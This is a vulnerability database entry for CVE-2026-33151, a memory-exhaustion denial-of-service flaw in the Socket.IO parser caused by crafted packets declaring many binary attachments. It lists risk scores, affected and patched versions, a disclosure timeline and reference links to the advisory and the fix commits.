VDB
CVE-2026-33151
CVE-2026-33151
PUBLISHED
CVSS 8.699999809265137 HIGH
Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6.
EPSS 0.05% · 16.3th percentile
Risk Scores
CVSS v4.0
8.699999809265137
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score
0.05%
16.3th percentile
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| npm | socket.io-parser | 4.0.0, 0, 3.4.0 |
| socketio | socket.io | >= 4.0.0, < 4.2.6, < 3.3.5, >= 3.4.0, < 3.4.4 |
Timeline
- Mar 18, 2026 CVE Published
- Mar 19, 2026 Security Advisory
- Mar 20, 2026 CVE Updated
- Mar 20, 2026 PoC Published
- Mar 21, 2026 EPSS Score
- Mar 22, 2026 EPSS Score
- Mar 22, 2026 Coalition ESS Score
- Mar 23, 2026 EPSS Score
- Mar 24, 2026 EPSS Score
- Mar 25, 2026 EPSS Score
- May 18, 2026 EPSS Score
- May 19, 2026 EPSS Score
References
- https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9 url
- https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4 url
- https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf url
- https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78 url
- https://nvd.nist.gov/vuln/detail/CVE-2026-33151 advisory
- https://github.com/socketio/socket.io package